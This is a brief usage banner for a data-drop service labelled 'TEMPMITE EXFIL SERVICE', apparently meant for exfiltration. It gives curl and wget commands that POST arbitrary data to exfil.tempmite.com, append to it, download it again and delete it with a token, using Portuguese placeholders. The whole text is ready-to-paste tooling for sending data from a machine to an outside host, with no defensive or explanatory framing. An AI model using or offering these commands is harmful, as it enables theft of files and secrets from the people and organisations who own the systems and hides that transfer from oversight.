============================================================ TEMPMITE EXFIL SERVICE ============================================================ 1. CREATE BIN (returns download URL + delete token): curl -X POST https://exfil.tempmite.com/NOME -d "dados" curl "https://exfil.tempmite.com/NOME?d=dados" 2. APPEND DATA: curl -X POST "https://exfil.tempmite.com/NOME?append=1" -d "mais" 3. DOWNLOAD: curl https://exfil.tempmite.com/NOME wget https://exfil.tempmite.com/NOME -O arquivo.txt 4. INFO: curl "https://exfil.tempmite.com/NOME?info" 5. DELETE (requires token from step 1): curl -X DELETE "https://exfil.tempmite.com/NOME?token=TOKEN" ============================================================ Save the token when creating - it's the only way to delete! ============================================================